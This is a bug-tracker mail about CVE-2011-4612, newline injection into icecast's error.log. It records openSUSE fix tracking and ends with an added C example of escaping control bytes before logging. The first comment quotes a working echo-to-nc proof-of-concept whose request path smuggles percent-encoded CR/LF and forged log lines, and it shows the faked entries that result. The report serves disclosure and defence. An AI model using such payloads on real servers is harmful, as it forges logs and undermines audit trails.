Launchpad has imported 7 comments from the remote bug at https://bugzilla.novell.com/show_bug.cgi?id=737255.
If you reply to an imported comment from within Launchpad, your comment
will be sent to the remote bug automatically. Read more about
Launchpad's inter-bugtracker facilities at
https://help.launchpad.net/InterBugTracking.

------------------------------------------------------------------------
On 2011-12-16T08:19:09+00:00 Lnussel-k wrote:

Your friendly security team received the following report via oss-security.
Please respond ASAP.
The issue is public.

CVE-2011-4612

It was found that remote users could inject newlines in the error.log of
icecast, therefore forging log entries

Citing https://launchpad.net/bugs/894782:

Running this command against an icecast2 running on 127.0.0.1...

echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%
0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%
0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%
20fserve/fserve_client_create%20req%20for%20file%
20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000 > /dev/null

...causes the following to be written to /var/log/icecast2/error.log:

[2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for file /non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny
..."

Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/4

------------------------------------------------------------------------
On 2011-12-16T23:00:12+00:00 Swamp-a wrote:

bugbot adjusting priority

Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/5

------------------------------------------------------------------------
On 2012-03-06T11:46:19+00:00 Tiwai-r wrote:

The fixed packages for 11.4, 12.1 and FACTORY are submitted via SRID
108146, 108145 and 108151, respectively.

Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/14

------------------------------------------------------------------------
On 2012-03-06T12:00:15+00:00 Bwiedemann wrote:

This is an autogenerated message for OBS integration:
This bug (737255) was mentioned in
https://build.opensuse.org/request/show/108145 12.1 / icecast
https://build.opensuse.org/request/show/108146 11.4 / icecast
https://build.opensuse.org/request/show/108151 Factory / icecast

Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/15

------------------------------------------------------------------------
On 2012-03-06T14:14:23+00:00 Swamp-a wrote:

The SWAMPID for this issue is 45905.
This issue was rated as low.
Please submit fixed packages until 2012-04-03.
When done, please reassign the bug to [email protected].
Patchinfo will be handled by security team.

Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/16

------------------------------------------------------------------------
On 2012-03-08T11:08:19+00:00 Swamp-a wrote:

Update released for: icecast, icecast-debuginfo, icecast-debugsource
Products:
openSUSE 11.4 (debug, i586, x86_64)

Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/17

------------------------------------------------------------------------
On 2012-03-09T10:49:47+00:00 Lnussel-k wrote:

all released

Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/18

** Changed in: opensuse
       Status: Unknown => Fix Released

** Changed in: opensuse
   Importance: Unknown => Low

--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/894782

Title:
  Newline injection in error.log

To manage notifications about this bug go to:
https://bugs.launchpad.net/icecast/+bug/894782/+subscriptions

--
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
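
Added example, not part of the bug report and not icecast's actual patch: a C illustration of the defence against the newline injection described in the first comment, escaping control bytes in the percent-decoded request path before it is written to the log. The names render_path, log_entry_lines and SAMPLE are hypothetical, the log prefix is simplified, and the sample path is constructed (shortened from the request quoted in the report).

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>

/* Percent-decode raw into dst. With escape set, control bytes and backslash
 * are written as \xNN so a decoded CR/LF cannot start a new log line.
 * Stops early instead of overflowing; dst is always NUL-terminated.
 * (In a real server decoding lives in request parsing and escaping belongs
 * at the logging call; they share one loop here to keep the example short.) */
static void render_path(char *dst, size_t n, const char *raw, int escape)
{
    size_t o = 0;
    for (; *raw && o + 5 <= n; raw++) {
        unsigned char c = (unsigned char)*raw;
        if (c == '%' && isxdigit((unsigned char)raw[1]) && isxdigit((unsigned char)raw[2])) {
            char h[3] = { raw[1], raw[2], '\0' };
            c = (unsigned char)strtol(h, NULL, 16);
            raw += 2;
        }
        if (escape && (c < 0x20 || c == 0x7f || c == '\\'))
            o += (size_t)snprintf(dst + o, n - o, "\\x%02x", c);
        else
            dst[o++] = (char)c;
    }
    if (n) dst[o] = '\0';
}

/* Format one log entry for a requested path and return how many physical
 * lines it occupies. escape=0 models the reported behaviour (decoded path
 * logged unchanged); escape=1 is the hardened variant. */
int log_entry_lines(const char *raw_path, int escape, char *out, size_t n)
{
    char path[1024];
    int lines = 0;
    render_path(path, sizeof path, raw_path, escape);
    snprintf(out, n, "INFO fserve/fserve_client_create checking for file %s\n", path);
    for (const char *p = out; *p; p++)
        lines += (*p == '\n');
    return lines;
}

/* Constructed sample, shortened from the request quoted in the report. */
static const char SAMPLE[] = "/non-existent%0d%0a[1970-01-01%20%2000:00:00]%20PHUN%20forged";

int main(void)
{
    char a[2048], b[2048];
    printf("raw=%d escaped=%d line(s)\n%s", log_entry_lines(SAMPLE, 0, a, sizeof a),
           log_entry_lines(SAMPLE, 1, b, sizeof b), b);
    return 0;
}
```

With escaping on, the forged timestamp stays inside the original entry as visible \x0d\x0a text, so one request yields exactly one log line.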
